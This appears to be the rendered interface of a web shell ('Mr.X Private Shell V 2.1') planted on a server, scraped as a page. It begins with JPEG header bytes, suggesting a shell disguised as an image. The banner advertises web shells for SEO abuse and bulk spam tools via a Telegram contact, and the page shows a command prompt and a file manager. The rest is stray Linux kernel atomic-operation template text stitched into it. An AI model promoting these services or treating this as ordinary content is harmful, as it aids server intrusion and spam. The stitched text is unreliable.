����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
cat <<EOF
/**
 * arch_${atomic}_inc_not_zero - increment unless the number is zero
 * @v: pointer of type ${atomic}_t
 *
 * Atomically increments @v by 1, if @v is non-zero.
 * Returns true if the increment was done.
 */
static __always_inline bool
arch_${atomic}_inc_not_zero(${atomic}_t *v)
{
	return arch_${atomic}_add_unless(v, 1, 0);
}
EOF

Filemanager

Name Type Size Permission Actions
acquire File 209 B 0644
add_negative File 435 B 0644
add_unless File 452 B 0644
andnot File 174 B 0644
dec File 160 B 0644
dec_and_test File 337 B 0644
dec_if_positive File 259 B 0644
dec_unless_positive File 249 B 0644
fence File 237 B 0644
fetch_add_unless File 552 B 0644
inc File 160 B 0644
inc_and_test File 340 B 0644
inc_not_zero File 345 B 0644
inc_unless_negative File 249 B 0644
read_acquire File 275 B 0644
release File 193 B 0644
set_release File 242 B 0644
sub_and_test File 414 B 0644
try_cmpxchg File 250 B 0644